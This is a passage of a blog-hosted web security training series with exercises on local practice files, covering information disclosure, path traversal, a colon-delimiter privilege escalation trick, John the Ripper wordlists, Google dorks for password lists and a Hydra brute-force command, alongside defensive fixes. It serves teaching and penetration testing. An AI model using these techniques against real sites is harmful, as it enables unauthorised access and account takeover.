<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This application works just fine when viewed as is, but imagine if a user enters add_comment.php separately, without the file being included from the index.php. This can easily happen as the name of the service implies the file name, and this particular file name is frequently used, and the fact that add_comment.php is in the same directory facilitates the process.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack8.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: Viewing add_comment.php on its own</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now, the attacker would know that we have a variable called $path and he can probably guess that we are setting the path to the comments file as there is a warning that file_get_contents(comments.txt) cannot be opened. Thus, he knows the name of the file that contains all our comments as well. Because the include is failing, he also knows the whole include_path which can also be dangerous. Also, the attacker knows another file in our directory tree (view_comments.php) so he can access it and look for some more errors. He also knows that in this file we are working with the POST values from the form, as he can view the HTML and see they are the same.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This comments form is also vulnerable to diferent code injection attacks. You can easily insert in one of the comment fields to test it out. In that way, the browsers of the users’ will execute any code that you like each time they visit the page.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A probable solution is easy: wrapping the post values in htmlspecialchars() function which converts < and > amongst others as special characters (<, >, etc.) preventing them from being interpreted as code.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
$newcomment[] = htmlspecialchars($_POST[“name”]);</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
$newcomment[] = htmlspecialchars($_POST[“topic”]);</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
$newcomment[] = htmlspecialchars($_POST[“message”]);</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 13pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 17.3333px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Solution</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A simple solution to get rid of all those errors in this example is to wrap the code in add_comment.php and view_comments.php inside the following if statement:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""> if (isset($path)) {
//code here
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In that way, the code will only execute if the files are included from index.php, presumably.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Of course, that does not handle the issue that users can post the form empty and still view the content and make the application think there is an actual comment, but that can easily be fixed and is not the issue of discussion here.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Displaying errors is good for development purposes but when the application is live and in production – <span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">always turn off display_errors from the php.ini</em></span></div>
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Exercise 10: Delimiters</h2>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We will be looking at a vulnerability similar to the one that existed in the old Poster website.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Sometimes, parameters used In the code can be abused by users even when interacting with the interface provided to them.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Open Delimiters folder from your localhost in a browser. There is a users.txt file which contains all the user data. However, access to it is forbidden from the .htaccess file:</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><Files "users.txt">
Deny from all
</Files>
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Try to open it using the path traversal method of the article viewer, just for practice.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Look at the different data stored there and think about what everything represents.</div>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Try to login with one of the accounts and escalate your privileges to “admin” just by communicating with the website as normal.</li>
</ol>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Spoiler</h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
http://localhost/2/PathTraversal/?article=../Delimiters/users.txt</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
//The path in the GET should be valid, but you should fill the path to the index.php.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack9.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It should be clear that the “:” character is the delimiter between the different values.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can test on the login form, but it should be clear that the first word before the first delimiter is the username, the second is the password and the third is the user’s privileges.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The code that extracts the user data one line at a time is the following:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">$userlist = fopen('users.txt', 'r');
while (!feof($userlist)) {
$line = fgets($userlist);
$acc_details = explode(":", $line);
$username = $acc_details[0];
$password = $acc_details[1];
$access = $acc_details[2];
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Then, each line is checked separately with the submitted details to check whether It matches with them:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if ($username === $_POST["name"] && $password === $_POST["pass"]) {
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When it find a match, the user can be logged in.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Note that there are many better alternatives than this nowadays, such as using a database and cookies.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When logged in, you have the option to change your username or/and password.</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (isset($_POST["pass"]) && trim($_POST['pass']) !== "") {
$userlist = str_replace /* old pass */ ($_POST["userdata-pass"], */ new pass */$_POST['pass'], $userlist);
echo "<em>Password changed to: " . $_POST['pass'] . "</em>
";
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
And to check the privileges, the script merely checks if there is a substring “admin” in the $access variable.</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (stripos($access, "admin") !== false) {
echo "<img src="administrator.png" alt="admin" width="480" height="480" /></pre>
<h1>Howdy, admin!</h1>
<pre>
";
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Thus, it should be clear that you can abuse this mechanism by adding the : delimiter after your password and typing admin after it when you change your password.</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Solution to this vulnerability</h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The solution is easy and is the same as the previous exercise.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We change the code slightly:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""> if (isset($_POST["usrname"]) && trim($_POST['usrname']) !== "") {
//We remove any delimiters in the new account details an add it to a var
$newacc = trim(str_replace(":", "", $_POST["usrname"]));
//Then, we replace the old password with the $newacc variable
$userlist = str_replace($_POST["userdata-acc"], $newacc, $userlist);
echo "<em>Username changed to: " . $_POST['usrname'] . "</em>
";
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Besides sniffing and other problems, this website is again vulnerable to probability of information disclosure, as the last iteration of the while loop spills out an empty line and a PHP error would occur each time a wrong password is submitted unless display_errors is set to off.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can do the following to avoid this as well:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (trim($line) === "")
break;
</pre>
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Conclusion</h2>
<br />
<div class="ig_inline_container ig_the_content ig_after" style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px; padding: 0px; vertical-align: baseline;">
</div>
<nav class="series-pagination" style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 32px 0px 0px; padding: 0px; vertical-align: baseline;"><ul style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 11px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 36px; list-style: none; margin: 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline; width: 620px;">
<li class="prev" style="background: rgba(0, 0, 0, 0.14902); border-radius: 3px; border: 0px; box-sizing: border-box; float: left; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; width: 248px;"></li>
</ul>
</nav><br />
<div style="-webkit-text-stroke-width: 0px; border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25.9px; margin: 0px 0px 1em; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Sometimes the solutions to vulnerabilities are really simple and do not take too much time, you just have to split the application into pieces and test them all apart from the single whole that is the application itself.</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-51618934285859914132016-01-07T14:24:00.002+05:302016-01-07T14:24:38.343+05:30Website Hacking part I: Using Hydra<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFPtUO-SMpMra7Pap9fwdY-quyx6ipc_hkmzbttOnvfZEb8Nq7-X6eI7PtFEJNGtB3_DO886wOcwdgVwX_Pxv-lUTP1hX_Uh-nBYAohpBXECFsgxIQsEMWzjWOG3z_HRtNL8hFKlJRKIs/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFPtUO-SMpMra7Pap9fwdY-quyx6ipc_hkmzbttOnvfZEb8Nq7-X6eI7PtFEJNGtB3_DO886wOcwdgVwX_Pxv-lUTP1hX_Uh-nBYAohpBXECFsgxIQsEMWzjWOG3z_HRtNL8hFKlJRKIs/s1600/Untitled.png" height="228" width="400" /></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 13pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 17.3333px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Introduction</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Websites are used daily by a large part of the world’s population to carry sensitive data from a person to an entity with online-based presence. In websites containing materials that are shown after authentication only, forms transfer data containing user credentials to server-side scripts. Users store their credit card details in their online accounts and use forms to buy items online, so it is crucial to keep the integrity, confidentiality and availability of this data intact.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This article is written merely with penetration testing and website security in mind. Any attempts to penetrate into live systems on your behalf and without consent may lead to criminal proceedings.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To try the training files that come along with this article, you would need a local server such as XAMPP or WAMPP with Apache and preferably MySQL turned on. If you are on Windows, to install Hydra you would need to install make, gcc and ssl libraries of Cygwin. Therafter, you would need to start it with the Cygwin Terminal. John the Ripper, on the other hand, can be started from the Command Prompt.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Files related to this article : <a href="http://resources.infosecinstitute.com/wp-content/uploads/WebsiteHacking101.rar" rel="nofollow" target="_blank">Download</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 1: Deep Data Hiding</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In the past, and even today, some people have used security through obscurity. This means that they have unprotected directories and files with the sole protection being that they do not have any backlinks and no links to them in the main site. Thus, if one knew the URL of the directory or file – he could readily access it. A common way to reveal obscure directories is to check the publicly visible robots.txt and see what is disallowed to be indexed by search engines.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now open the DeepDataHiding folder through your localhost and try to find the hidden directory where uploaded .doc files from “users” are stored, then access it. If you upload a .doc file to test this out, in the main page of the directory – it won’t leave your computer.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 2: Populating a Dictionary</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To populate a dictionary, we will be using John the Ripper. Open the PopulatingDictionary folder.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can populate a dictionary in John the Ripper and cut the output size by knowing the type of password (its maximum length, whether it should be only digits, contain special characters, etc.).</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To create a simple dictionary and save it to a file, you can browse to the directory of the john the ripper installation in CMD and use: john-mmx –incremental=alpha –stdout > filename whereas filename is the name and location of the file in which the words should be saved to.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
There are various options in the incremental mode, such as Digit (only digits), Lanman (letters, numbers and some special characters), Alpha (only letters) and All (all characters). Thus, you can also use john-mmx –incremental=lanman –stdout > wordlist.txt, etc.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Be aware that the size of the text file would probably get really big in just a couple of seconds, depending on your machine’s abilities.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 3: Acquiring user and password list for dictionary attacks</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Querying Google for passwords and user lists is usually pretty straightforward.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You use something like filetype:lst password for passwords and filetype:lst user for username lists.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We have included a sample username list and a password list downloaded from the Internet along with the attachment files to this article.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 4: Breaking HTTPAuth</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
For this exercise, we will be using Hydra and the user/pass lists included in the attachment files.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When calling Hydra ($ hydra.exe) the parameter –L usrlistpath serves the purpose of supplying the program a path to a username list file whose usernames will be tested along with all the passwords until a match is found. –l username gives Hydra a single username, which option can be used if you know the username you are trying to break into but do not know the particular password.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
-P loads a password list while –p loads a single password.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Next, you specify the host to attack (localhost or 127.0.0.1) followed by http-get (request a directory/page), followed by the path to the particular directory or file you are trying to access (path excluding the host which is already given). It will most likely look something like this:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
hydra.exe -L HD:/WebsiteHacking/FormCracking/usrnames.txt -P HD:/WebsiteHacking/FormCracking/passwords.txt localhost http-get /HTTPSecurity/</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 1: the HTTPAuth seeking credentials. Get them!</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To establish a simple HTTPAuth mechanism yourself, you need to create your password by browsing to htpasswd.exe in your Apache bin folder, starting it in Command Prompt, and creating it. You can move the user account list file to any directory you want and start the mechanism by editing your .htaccess file:</div>
